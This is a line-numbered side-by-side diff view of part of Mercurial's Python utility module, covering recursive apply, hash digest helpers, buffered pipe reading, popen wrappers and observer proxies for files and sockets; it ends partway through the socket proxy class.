188 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
191 return f(xs)
189 return f(xs)
192
190
193 def rapply(f, xs):
191 def rapply(f, xs):
194 """Apply function recursively to every item preserving the data structure
192 """Apply function recursively to every item preserving the data structure
195
193
196 >>> def f(x):
194 >>> def f(x):
197 ... return 'f(%s)' % x
195 ... return 'f(%s)' % x
198 >>> rapply(f, None) is None
196 >>> rapply(f, None) is None
199 True
197 True
200 >>> rapply(f, 'a')
198 >>> rapply(f, 'a')
201 'f(a)'
199 'f(a)'
202 >>> rapply(f, {'a'}) == {'f(a)'}
200 >>> rapply(f, {'a'}) == {'f(a)'}
203 True
201 True
204 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
202 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
205 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
203 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
206
204
207 >>> xs = [object()]
205 >>> xs = [object()]
208 >>> rapply(pycompat.identity, xs) is xs
206 >>> rapply(pycompat.identity, xs) is xs
209 True
207 True
210 """
208 """
211 if f is pycompat.identity:
209 if f is pycompat.identity:
212 # fast path mainly for py2
210 # fast path mainly for py2
213 return xs
211 return xs
214 return _rapply(f, xs)
212 return _rapply(f, xs)
215
213
216 def bitsfrom(container):
214 def bitsfrom(container):
217 bits = 0
215 bits = 0
218 for bit in container:
216 for bit in container:
219 bits |= bit
217 bits |= bit
220 return bits
218 return bits
221
219
222 # python 2.6 still have deprecation warning enabled by default. We do not want
220 # python 2.6 still have deprecation warning enabled by default. We do not want
223 # to display anything to standard user so detect if we are running test and
221 # to display anything to standard user so detect if we are running test and
224 # only use python deprecation warning in this case.
222 # only use python deprecation warning in this case.
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
223 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
226 if _dowarn:
224 if _dowarn:
227 # explicitly unfilter our warning for python 2.7
225 # explicitly unfilter our warning for python 2.7
228 #
226 #
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
227 # The option of setting PYTHONWARNINGS in the test runner was investigated.
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
228 # However, module name set through PYTHONWARNINGS was exactly matched, so
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
229 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
230 # makes the whole PYTHONWARNINGS thing useless for our usecase.
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
231 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
232 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
236 if _dowarn and pycompat.ispy3:
234 if _dowarn and pycompat.ispy3:
237 # silence warning emitted by passing user string to re.sub()
235 # silence warning emitted by passing user string to re.sub()
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
236 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
239 r'mercurial')
237 r'mercurial')
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
238 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
241 DeprecationWarning, r'mercurial')
239 DeprecationWarning, r'mercurial')
242
240
243 def nouideprecwarn(msg, version, stacklevel=1):
241 def nouideprecwarn(msg, version, stacklevel=1):
244 """Issue an python native deprecation warning
242 """Issue an python native deprecation warning
245
243
246 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
244 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
247 """
245 """
248 if _dowarn:
246 if _dowarn:
249 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
247 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
250 " update your code.)") % version
248 " update your code.)") % version
251 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
249 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
252
250
253 DIGESTS = {
251 DIGESTS = {
254 'md5': hashlib.md5,
252 'md5': hashlib.md5,
255 'sha1': hashlib.sha1,
253 'sha1': hashlib.sha1,
256 'sha512': hashlib.sha512,
254 'sha512': hashlib.sha512,
257 }
255 }
258 # List of digest types from strongest to weakest
256 # List of digest types from strongest to weakest
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
257 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
260
258
261 for k in DIGESTS_BY_STRENGTH:
259 for k in DIGESTS_BY_STRENGTH:
262 assert k in DIGESTS
260 assert k in DIGESTS
263
261
264 class digester(object):
262 class digester(object):
265 """helper to compute digests.
263 """helper to compute digests.
266
264
267 This helper can be used to compute one or more digests given their name.
265 This helper can be used to compute one or more digests given their name.
268
266
269 >>> d = digester([b'md5', b'sha1'])
267 >>> d = digester([b'md5', b'sha1'])
270 >>> d.update(b'foo')
268 >>> d.update(b'foo')
271 >>> [k for k in sorted(d)]
269 >>> [k for k in sorted(d)]
272 ['md5', 'sha1']
270 ['md5', 'sha1']
273 >>> d[b'md5']
271 >>> d[b'md5']
274 'acbd18db4cc2f85cedef654fccc4a4d8'
272 'acbd18db4cc2f85cedef654fccc4a4d8'
275 >>> d[b'sha1']
273 >>> d[b'sha1']
276 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
274 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
277 >>> digester.preferred([b'md5', b'sha1'])
275 >>> digester.preferred([b'md5', b'sha1'])
278 'sha1'
276 'sha1'
279 """
277 """
280
278
281 def __init__(self, digests, s=''):
279 def __init__(self, digests, s=''):
282 self._hashes = {}
280 self._hashes = {}
283 for k in digests:
281 for k in digests:
284 if k not in DIGESTS:
282 if k not in DIGESTS:
285 raise error.Abort(_('unknown digest type: %s') % k)
283 raise error.Abort(_('unknown digest type: %s') % k)
286 self._hashes[k] = DIGESTS[k]()
284 self._hashes[k] = DIGESTS[k]()
287 if s:
285 if s:
288 self.update(s)
286 self.update(s)
289
287
290 def update(self, data):
288 def update(self, data):
291 for h in self._hashes.values():
289 for h in self._hashes.values():
292 h.update(data)
290 h.update(data)
293
291
294 def __getitem__(self, key):
292 def __getitem__(self, key):
295 if key not in DIGESTS:
293 if key not in DIGESTS:
296 raise error.Abort(_('unknown digest type: %s') % k)
294 raise error.Abort(_('unknown digest type: %s') % k)
297 return nodemod.hex(self._hashes[key].digest())
295 return nodemod.hex(self._hashes[key].digest())
298
296
299 def __iter__(self):
297 def __iter__(self):
300 return iter(self._hashes)
298 return iter(self._hashes)
301
299
302 @staticmethod
300 @staticmethod
303 def preferred(supported):
301 def preferred(supported):
304 """returns the strongest digest type in both supported and DIGESTS."""
302 """returns the strongest digest type in both supported and DIGESTS."""
305
303
306 for k in DIGESTS_BY_STRENGTH:
304 for k in DIGESTS_BY_STRENGTH:
307 if k in supported:
305 if k in supported:
308 return k
306 return k
309 return None
307 return None
310
308
311 class digestchecker(object):
309 class digestchecker(object):
312 """file handle wrapper that additionally checks content against a given
310 """file handle wrapper that additionally checks content against a given
313 size and digests.
311 size and digests.
314
312
315 d = digestchecker(fh, size, {'md5': '...'})
313 d = digestchecker(fh, size, {'md5': '...'})
316
314
317 When multiple digests are given, all of them are validated.
315 When multiple digests are given, all of them are validated.
318 """
316 """
319
317
320 def __init__(self, fh, size, digests):
318 def __init__(self, fh, size, digests):
321 self._fh = fh
319 self._fh = fh
322 self._size = size
320 self._size = size
323 self._got = 0
321 self._got = 0
324 self._digests = dict(digests)
322 self._digests = dict(digests)
325 self._digester = digester(self._digests.keys())
323 self._digester = digester(self._digests.keys())
326
324
327 def read(self, length=-1):
325 def read(self, length=-1):
328 content = self._fh.read(length)
326 content = self._fh.read(length)
329 self._digester.update(content)
327 self._digester.update(content)
330 self._got += len(content)
328 self._got += len(content)
331 return content
329 return content
332
330
333 def validate(self):
331 def validate(self):
334 if self._size != self._got:
332 if self._size != self._got:
335 raise error.Abort(_('size mismatch: expected %d, got %d') %
333 raise error.Abort(_('size mismatch: expected %d, got %d') %
336 (self._size, self._got))
334 (self._size, self._got))
337 for k, v in self._digests.items():
335 for k, v in self._digests.items():
338 if v != self._digester[k]:
336 if v != self._digester[k]:
339 # i18n: first parameter is a digest name
337 # i18n: first parameter is a digest name
340 raise error.Abort(_('%s mismatch: expected %s, got %s') %
338 raise error.Abort(_('%s mismatch: expected %s, got %s') %
341 (k, v, self._digester[k]))
339 (k, v, self._digester[k]))
342
340
343 try:
341 try:
344 buffer = buffer
342 buffer = buffer
345 except NameError:
343 except NameError:
346 def buffer(sliceable, offset=0, length=None):
344 def buffer(sliceable, offset=0, length=None):
347 if length is not None:
345 if length is not None:
348 return memoryview(sliceable)[offset:offset + length]
346 return memoryview(sliceable)[offset:offset + length]
349 return memoryview(sliceable)[offset:]
347 return memoryview(sliceable)[offset:]
350
348
351 closefds = pycompat.isposix
349 closefds = pycompat.isposix
352
350
353 _chunksize = 4096
351 _chunksize = 4096
354
352
355 class bufferedinputpipe(object):
353 class bufferedinputpipe(object):
356 """a manually buffered input pipe
354 """a manually buffered input pipe
357
355
358 Python will not let us use buffered IO and lazy reading with 'polling' at
356 Python will not let us use buffered IO and lazy reading with 'polling' at
359 the same time. We cannot probe the buffer state and select will not detect
357 the same time. We cannot probe the buffer state and select will not detect
360 that data are ready to read if they are already buffered.
358 that data are ready to read if they are already buffered.
361
359
362 This class let us work around that by implementing its own buffering
360 This class let us work around that by implementing its own buffering
363 (allowing efficient readline) while offering a way to know if the buffer is
361 (allowing efficient readline) while offering a way to know if the buffer is
364 empty from the output (allowing collaboration of the buffer with polling).
362 empty from the output (allowing collaboration of the buffer with polling).
365
363
366 This class lives in the 'util' module because it makes use of the 'os'
364 This class lives in the 'util' module because it makes use of the 'os'
367 module from the python stdlib.
365 module from the python stdlib.
368 """
366 """
369 def __new__(cls, fh):
367 def __new__(cls, fh):
370 # If we receive a fileobjectproxy, we need to use a variation of this
368 # If we receive a fileobjectproxy, we need to use a variation of this
371 # class that notifies observers about activity.
369 # class that notifies observers about activity.
372 if isinstance(fh, fileobjectproxy):
370 if isinstance(fh, fileobjectproxy):
373 cls = observedbufferedinputpipe
371 cls = observedbufferedinputpipe
374
372
375 return super(bufferedinputpipe, cls).__new__(cls)
373 return super(bufferedinputpipe, cls).__new__(cls)
376
374
377 def __init__(self, input):
375 def __init__(self, input):
378 self._input = input
376 self._input = input
379 self._buffer = []
377 self._buffer = []
380 self._eof = False
378 self._eof = False
381 self._lenbuf = 0
379 self._lenbuf = 0
382
380
383 @property
381 @property
384 def hasbuffer(self):
382 def hasbuffer(self):
385 """True is any data is currently buffered
383 """True is any data is currently buffered
386
384
387 This will be used externally a pre-step for polling IO. If there is
385 This will be used externally a pre-step for polling IO. If there is
388 already data then no polling should be set in place."""
386 already data then no polling should be set in place."""
389 return bool(self._buffer)
387 return bool(self._buffer)
390
388
391 @property
389 @property
392 def closed(self):
390 def closed(self):
393 return self._input.closed
391 return self._input.closed
394
392
395 def fileno(self):
393 def fileno(self):
396 return self._input.fileno()
394 return self._input.fileno()
397
395
398 def close(self):
396 def close(self):
399 return self._input.close()
397 return self._input.close()
400
398
401 def read(self, size):
399 def read(self, size):
402 while (not self._eof) and (self._lenbuf < size):
400 while (not self._eof) and (self._lenbuf < size):
403 self._fillbuffer()
401 self._fillbuffer()
404 return self._frombuffer(size)
402 return self._frombuffer(size)
405
403
406 def readline(self, *args, **kwargs):
404 def readline(self, *args, **kwargs):
407 if 1 < len(self._buffer):
405 if 1 < len(self._buffer):
408 # this should not happen because both read and readline end with a
406 # this should not happen because both read and readline end with a
409 # _frombuffer call that collapse it.
407 # _frombuffer call that collapse it.
410 self._buffer = [''.join(self._buffer)]
408 self._buffer = [''.join(self._buffer)]
411 self._lenbuf = len(self._buffer[0])
409 self._lenbuf = len(self._buffer[0])
412 lfi = -1
410 lfi = -1
413 if self._buffer:
411 if self._buffer:
414 lfi = self._buffer[-1].find('\n')
412 lfi = self._buffer[-1].find('\n')
415 while (not self._eof) and lfi < 0:
413 while (not self._eof) and lfi < 0:
416 self._fillbuffer()
414 self._fillbuffer()
417 if self._buffer:
415 if self._buffer:
418 lfi = self._buffer[-1].find('\n')
416 lfi = self._buffer[-1].find('\n')
419 size = lfi + 1
417 size = lfi + 1
420 if lfi < 0: # end of file
418 if lfi < 0: # end of file
421 size = self._lenbuf
419 size = self._lenbuf
422 elif 1 < len(self._buffer):
420 elif 1 < len(self._buffer):
423 # we need to take previous chunks into account
421 # we need to take previous chunks into account
424 size += self._lenbuf - len(self._buffer[-1])
422 size += self._lenbuf - len(self._buffer[-1])
425 return self._frombuffer(size)
423 return self._frombuffer(size)
426
424
427 def _frombuffer(self, size):
425 def _frombuffer(self, size):
428 """return at most 'size' data from the buffer
426 """return at most 'size' data from the buffer
429
427
430 The data are removed from the buffer."""
428 The data are removed from the buffer."""
431 if size == 0 or not self._buffer:
429 if size == 0 or not self._buffer:
432 return ''
430 return ''
433 buf = self._buffer[0]
431 buf = self._buffer[0]
434 if 1 < len(self._buffer):
432 if 1 < len(self._buffer):
435 buf = ''.join(self._buffer)
433 buf = ''.join(self._buffer)
436
434
437 data = buf[:size]
435 data = buf[:size]
438 buf = buf[len(data):]
436 buf = buf[len(data):]
439 if buf:
437 if buf:
440 self._buffer = [buf]
438 self._buffer = [buf]
441 self._lenbuf = len(buf)
439 self._lenbuf = len(buf)
442 else:
440 else:
443 self._buffer = []
441 self._buffer = []
444 self._lenbuf = 0
442 self._lenbuf = 0
445 return data
443 return data
446
444
447 def _fillbuffer(self):
445 def _fillbuffer(self):
448 """read data to the buffer"""
446 """read data to the buffer"""
449 data = os.read(self._input.fileno(), _chunksize)
447 data = os.read(self._input.fileno(), _chunksize)
450 if not data:
448 if not data:
451 self._eof = True
449 self._eof = True
452 else:
450 else:
453 self._lenbuf += len(data)
451 self._lenbuf += len(data)
454 self._buffer.append(data)
452 self._buffer.append(data)
455
453
456 return data
454 return data
457
455
458 def mmapread(fp):
456 def mmapread(fp):
459 try:
457 try:
460 fd = getattr(fp, 'fileno', lambda: fp)()
458 fd = getattr(fp, 'fileno', lambda: fp)()
461 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
459 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
462 except ValueError:
460 except ValueError:
463 # Empty files cannot be mmapped, but mmapread should still work. Check
461 # Empty files cannot be mmapped, but mmapread should still work. Check
464 # if the file is empty, and if so, return an empty buffer.
462 # if the file is empty, and if so, return an empty buffer.
465 if os.fstat(fd).st_size == 0:
463 if os.fstat(fd).st_size == 0:
466 return ''
464 return ''
467 raise
465 raise
468
466
469 def popen2(cmd, env=None, newlines=False):
467 def popen2(cmd, env=None, newlines=False):
470 # Setting bufsize to -1 lets the system decide the buffer size.
468 # Setting bufsize to -1 lets the system decide the buffer size.
471 # The default for bufsize is 0, meaning unbuffered. This leads to
469 # The default for bufsize is 0, meaning unbuffered. This leads to
472 # poor performance on Mac OS X: http://bugs.python.org/issue4194
470 # poor performance on Mac OS X: http://bugs.python.org/issue4194
473 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
471 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
474 close_fds=closefds,
472 close_fds=closefds,
475 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
473 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
476 universal_newlines=newlines,
474 universal_newlines=newlines,
477 env=env)
475 env=env)
478 return p.stdin, p.stdout
476 return p.stdin, p.stdout
479
477
480 def popen3(cmd, env=None, newlines=False):
478 def popen3(cmd, env=None, newlines=False):
481 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
479 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
482 return stdin, stdout, stderr
480 return stdin, stdout, stderr
483
481
484 def popen4(cmd, env=None, newlines=False, bufsize=-1):
482 def popen4(cmd, env=None, newlines=False, bufsize=-1):
485 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
483 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
486 close_fds=closefds,
484 close_fds=closefds,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
488 stderr=subprocess.PIPE,
486 stderr=subprocess.PIPE,
489 universal_newlines=newlines,
487 universal_newlines=newlines,
490 env=env)
488 env=env)
491 return p.stdin, p.stdout, p.stderr, p
489 return p.stdin, p.stdout, p.stderr, p
492
490
493 class fileobjectproxy(object):
491 class fileobjectproxy(object):
494 """A proxy around file objects that tells a watcher when events occur.
492 """A proxy around file objects that tells a watcher when events occur.
495
493
496 This type is intended to only be used for testing purposes. Think hard
494 This type is intended to only be used for testing purposes. Think hard
497 before using it in important code.
495 before using it in important code.
498 """
496 """
499 __slots__ = (
497 __slots__ = (
500 r'_orig',
498 r'_orig',
501 r'_observer',
499 r'_observer',
502 )
500 )
503
501
504 def __init__(self, fh, observer):
502 def __init__(self, fh, observer):
505 object.__setattr__(self, r'_orig', fh)
503 object.__setattr__(self, r'_orig', fh)
506 object.__setattr__(self, r'_observer', observer)
504 object.__setattr__(self, r'_observer', observer)
507
505
508 def __getattribute__(self, name):
506 def __getattribute__(self, name):
509 ours = {
507 ours = {
510 r'_observer',
508 r'_observer',
511
509
512 # IOBase
510 # IOBase
513 r'close',
511 r'close',
514 # closed if a property
512 # closed if a property
515 r'fileno',
513 r'fileno',
516 r'flush',
514 r'flush',
517 r'isatty',
515 r'isatty',
518 r'readable',
516 r'readable',
519 r'readline',
517 r'readline',
520 r'readlines',
518 r'readlines',
521 r'seek',
519 r'seek',
522 r'seekable',
520 r'seekable',
523 r'tell',
521 r'tell',
524 r'truncate',
522 r'truncate',
525 r'writable',
523 r'writable',
526 r'writelines',
524 r'writelines',
527 # RawIOBase
525 # RawIOBase
528 r'read',
526 r'read',
529 r'readall',
527 r'readall',
530 r'readinto',
528 r'readinto',
531 r'write',
529 r'write',
532 # BufferedIOBase
530 # BufferedIOBase
533 # raw is a property
531 # raw is a property
534 r'detach',
532 r'detach',
535 # read defined above
533 # read defined above
536 r'read1',
534 r'read1',
537 # readinto defined above
535 # readinto defined above
538 # write defined above
536 # write defined above
539 }
537 }
540
538
541 # We only observe some methods.
539 # We only observe some methods.
542 if name in ours:
540 if name in ours:
543 return object.__getattribute__(self, name)
541 return object.__getattribute__(self, name)
544
542
545 return getattr(object.__getattribute__(self, r'_orig'), name)
543 return getattr(object.__getattribute__(self, r'_orig'), name)
546
544
547 def __nonzero__(self):
545 def __nonzero__(self):
548 return bool(object.__getattribute__(self, r'_orig'))
546 return bool(object.__getattribute__(self, r'_orig'))
549
547
550 __bool__ = __nonzero__
548 __bool__ = __nonzero__
551
549
552 def __delattr__(self, name):
550 def __delattr__(self, name):
553 return delattr(object.__getattribute__(self, r'_orig'), name)
551 return delattr(object.__getattribute__(self, r'_orig'), name)
554
552
555 def __setattr__(self, name, value):
553 def __setattr__(self, name, value):
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
554 return setattr(object.__getattribute__(self, r'_orig'), name, value)
557
555
558 def __iter__(self):
556 def __iter__(self):
559 return object.__getattribute__(self, r'_orig').__iter__()
557 return object.__getattribute__(self, r'_orig').__iter__()
560
558
561 def _observedcall(self, name, *args, **kwargs):
559 def _observedcall(self, name, *args, **kwargs):
562 # Call the original object.
560 # Call the original object.
563 orig = object.__getattribute__(self, r'_orig')
561 orig = object.__getattribute__(self, r'_orig')
564 res = getattr(orig, name)(*args, **kwargs)
562 res = getattr(orig, name)(*args, **kwargs)
565
563
566 # Call a method on the observer of the same name with arguments
564 # Call a method on the observer of the same name with arguments
567 # so it can react, log, etc.
565 # so it can react, log, etc.
568 observer = object.__getattribute__(self, r'_observer')
566 observer = object.__getattribute__(self, r'_observer')
569 fn = getattr(observer, name, None)
567 fn = getattr(observer, name, None)
570 if fn:
568 if fn:
571 fn(res, *args, **kwargs)
569 fn(res, *args, **kwargs)
572
570
573 return res
571 return res
574
572
575 def close(self, *args, **kwargs):
573 def close(self, *args, **kwargs):
576 return object.__getattribute__(self, r'_observedcall')(
574 return object.__getattribute__(self, r'_observedcall')(
577 r'close', *args, **kwargs)
575 r'close', *args, **kwargs)
578
576
579 def fileno(self, *args, **kwargs):
577 def fileno(self, *args, **kwargs):
580 return object.__getattribute__(self, r'_observedcall')(
578 return object.__getattribute__(self, r'_observedcall')(
581 r'fileno', *args, **kwargs)
579 r'fileno', *args, **kwargs)
582
580
583 def flush(self, *args, **kwargs):
581 def flush(self, *args, **kwargs):
584 return object.__getattribute__(self, r'_observedcall')(
582 return object.__getattribute__(self, r'_observedcall')(
585 r'flush', *args, **kwargs)
583 r'flush', *args, **kwargs)
586
584
587 def isatty(self, *args, **kwargs):
585 def isatty(self, *args, **kwargs):
588 return object.__getattribute__(self, r'_observedcall')(
586 return object.__getattribute__(self, r'_observedcall')(
589 r'isatty', *args, **kwargs)
587 r'isatty', *args, **kwargs)
590
588
591 def readable(self, *args, **kwargs):
589 def readable(self, *args, **kwargs):
592 return object.__getattribute__(self, r'_observedcall')(
590 return object.__getattribute__(self, r'_observedcall')(
593 r'readable', *args, **kwargs)
591 r'readable', *args, **kwargs)
594
592
595 def readline(self, *args, **kwargs):
593 def readline(self, *args, **kwargs):
596 return object.__getattribute__(self, r'_observedcall')(
594 return object.__getattribute__(self, r'_observedcall')(
597 r'readline', *args, **kwargs)
595 r'readline', *args, **kwargs)
598
596
599 def readlines(self, *args, **kwargs):
597 def readlines(self, *args, **kwargs):
600 return object.__getattribute__(self, r'_observedcall')(
598 return object.__getattribute__(self, r'_observedcall')(
601 r'readlines', *args, **kwargs)
599 r'readlines', *args, **kwargs)
602
600
603 def seek(self, *args, **kwargs):
601 def seek(self, *args, **kwargs):
604 return object.__getattribute__(self, r'_observedcall')(
602 return object.__getattribute__(self, r'_observedcall')(
605 r'seek', *args, **kwargs)
603 r'seek', *args, **kwargs)
606
604
607 def seekable(self, *args, **kwargs):
605 def seekable(self, *args, **kwargs):
608 return object.__getattribute__(self, r'_observedcall')(
606 return object.__getattribute__(self, r'_observedcall')(
609 r'seekable', *args, **kwargs)
607 r'seekable', *args, **kwargs)
610
608
611 def tell(self, *args, **kwargs):
609 def tell(self, *args, **kwargs):
612 return object.__getattribute__(self, r'_observedcall')(
610 return object.__getattribute__(self, r'_observedcall')(
613 r'tell', *args, **kwargs)
611 r'tell', *args, **kwargs)
614
612
615 def truncate(self, *args, **kwargs):
613 def truncate(self, *args, **kwargs):
616 return object.__getattribute__(self, r'_observedcall')(
614 return object.__getattribute__(self, r'_observedcall')(
617 r'truncate', *args, **kwargs)
615 r'truncate', *args, **kwargs)
618
616
619 def writable(self, *args, **kwargs):
617 def writable(self, *args, **kwargs):
620 return object.__getattribute__(self, r'_observedcall')(
618 return object.__getattribute__(self, r'_observedcall')(
621 r'writable', *args, **kwargs)
619 r'writable', *args, **kwargs)
622
620
623 def writelines(self, *args, **kwargs):
621 def writelines(self, *args, **kwargs):
624 return object.__getattribute__(self, r'_observedcall')(
622 return object.__getattribute__(self, r'_observedcall')(
625 r'writelines', *args, **kwargs)
623 r'writelines', *args, **kwargs)
626
624
627 def read(self, *args, **kwargs):
625 def read(self, *args, **kwargs):
628 return object.__getattribute__(self, r'_observedcall')(
626 return object.__getattribute__(self, r'_observedcall')(
629 r'read', *args, **kwargs)
627 r'read', *args, **kwargs)
630
628
631 def readall(self, *args, **kwargs):
629 def readall(self, *args, **kwargs):
632 return object.__getattribute__(self, r'_observedcall')(
630 return object.__getattribute__(self, r'_observedcall')(
633 r'readall', *args, **kwargs)
631 r'readall', *args, **kwargs)
634
632
635 def readinto(self, *args, **kwargs):
633 def readinto(self, *args, **kwargs):
636 return object.__getattribute__(self, r'_observedcall')(
634 return object.__getattribute__(self, r'_observedcall')(
637 r'readinto', *args, **kwargs)
635 r'readinto', *args, **kwargs)
638
636
639 def write(self, *args, **kwargs):
637 def write(self, *args, **kwargs):
640 return object.__getattribute__(self, r'_observedcall')(
638 return object.__getattribute__(self, r'_observedcall')(
641 r'write', *args, **kwargs)
639 r'write', *args, **kwargs)
642
640
643 def detach(self, *args, **kwargs):
641 def detach(self, *args, **kwargs):
644 return object.__getattribute__(self, r'_observedcall')(
642 return object.__getattribute__(self, r'_observedcall')(
645 r'detach', *args, **kwargs)
643 r'detach', *args, **kwargs)
646
644
647 def read1(self, *args, **kwargs):
645 def read1(self, *args, **kwargs):
648 return object.__getattribute__(self, r'_observedcall')(
646 return object.__getattribute__(self, r'_observedcall')(
649 r'read1', *args, **kwargs)
647 r'read1', *args, **kwargs)
650
648
651 class observedbufferedinputpipe(bufferedinputpipe):
649 class observedbufferedinputpipe(bufferedinputpipe):
652 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
650 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
653
651
654 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
652 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
655 bypass ``fileobjectproxy``. Because of this, we need to make
653 bypass ``fileobjectproxy``. Because of this, we need to make
656 ``bufferedinputpipe`` aware of these operations.
654 ``bufferedinputpipe`` aware of these operations.
657
655
658 This variation of ``bufferedinputpipe`` can notify observers about
656 This variation of ``bufferedinputpipe`` can notify observers about
659 ``os.read()`` events. It also re-publishes other events, such as
657 ``os.read()`` events. It also re-publishes other events, such as
660 ``read()`` and ``readline()``.
658 ``read()`` and ``readline()``.
661 """
659 """
662 def _fillbuffer(self):
660 def _fillbuffer(self):
663 res = super(observedbufferedinputpipe, self)._fillbuffer()
661 res = super(observedbufferedinputpipe, self)._fillbuffer()
664
662
665 fn = getattr(self._input._observer, r'osread', None)
663 fn = getattr(self._input._observer, r'osread', None)
666 if fn:
664 if fn:
667 fn(res, _chunksize)
665 fn(res, _chunksize)
668
666
669 return res
667 return res
670
668
671 # We use different observer methods because the operation isn't
669 # We use different observer methods because the operation isn't
672 # performed on the actual file object but on us.
670 # performed on the actual file object but on us.
673 def read(self, size):
671 def read(self, size):
674 res = super(observedbufferedinputpipe, self).read(size)
672 res = super(observedbufferedinputpipe, self).read(size)
675
673
676 fn = getattr(self._input._observer, r'bufferedread', None)
674 fn = getattr(self._input._observer, r'bufferedread', None)
677 if fn:
675 if fn:
678 fn(res, size)
676 fn(res, size)
679
677
680 return res
678 return res
681
679
682 def readline(self, *args, **kwargs):
680 def readline(self, *args, **kwargs):
683 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
681 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
684
682
685 fn = getattr(self._input._observer, r'bufferedreadline', None)
683 fn = getattr(self._input._observer, r'bufferedreadline', None)
686 if fn:
684 if fn:
687 fn(res)
685 fn(res)
688
686
689 return res
687 return res
690
688
691 PROXIED_SOCKET_METHODS = {
689 PROXIED_SOCKET_METHODS = {
692 r'makefile',
690 r'makefile',
693 r'recv',
691 r'recv',
694 r'recvfrom',
692 r'recvfrom',
695 r'recvfrom_into',
693 r'recvfrom_into',
696 r'recv_into',
694 r'recv_into',
697 r'send',
695 r'send',
698 r'sendall',
696 r'sendall',
699 r'sendto',
697 r'sendto',
700 r'setblocking',
698 r'setblocking',
701 r'settimeout',
699 r'settimeout',
702 r'gettimeout',
700 r'gettimeout',
703 r'setsockopt',
701 r'setsockopt',
704 }
702 }
705
703
706 class socketproxy(object):
704 class socketproxy(object):
707 """A proxy around a socket that tells a watcher when events occur.
705 """A proxy around a socket that tells a watcher when events occur.
708
706
709 This is like ``fileobjectproxy`` except for sockets.
707 This is like ``fileobjectproxy`` except for sockets.
710
708
711 This type is intended to only be used for testing purposes. Think hard
709 This type is intended to only be used for testing purposes. Think hard
712 before using it in important code.
710 before using it in important code.
713 """
711 """
714 __slots__ = (
712 __slots__ = (
715 r'_orig',
713 r'_orig',
716 r'_observer',
714 r'_observer',
717 )
715 )
718
716
719 def __init__(self, sock, observer):
717 def __init__(self, sock, observer):
720 object.__setattr__(self, r'_orig', sock)
718 object.__setattr__(self, r'_orig', sock)
721 object.__setattr__(self, r'_observer', observer)
719 object.__setattr__(self, r'_observer', observer)
722
720
723 def __getattribute__(self, name):
721 def __getattribute__(self, name):
724 if name in PROXIED_SOCKET_METHODS:
722 if name in PROXIED_SOCKET_METHODS:
725 return object.__getattribute__(self, name)
723 return object.__getattribute__(self, name)
726
724
727 return getattr(object.__getattribute__(self, r'_orig'), name)
725 return getattr(object.__getattribute__(self, r'_orig'), name)
728
726
729 def __delattr__(self, name):
727 def __delattr__(self, name):
730 return delattr(object.__getattribute__(self, r'_orig'), name)
728 return delattr(object.__getattribute__(self, r'_orig'), name)
731
729
732 def __setattr__(self, name, value):
730 def __setattr__(self, name, value):
733 return setattr(object.__getattribute__(self, r'_orig'), name, value)
731 return setattr(object.__getattribute__(self, r'_orig'), name, value)
734
732
735 def __nonzero__(self):
733 def __nonzero__(self):
736 return bool(object.__getattribute__(self, r'_orig'))
734 return bool(object.__getattribute__(self, r'_orig'))
737
735
738 __bool__ = __nonzero__
736 __bool__ = __nonzero__
739
737
740 def _observedcall(self, name, *args, **kwargs):
738 def _observedcall(self, name, *args, **kwargs):
741 # Call the original object.
739 # Call the original object.
742 orig = object.__getattribute__(self, r'_orig')
740 orig = object.__getattribute__(self, r'_orig')
743 res = getattr(orig, name)(*args, **kwargs)
741 res = getattr(orig, name)(*args, **kwargs)
744
742
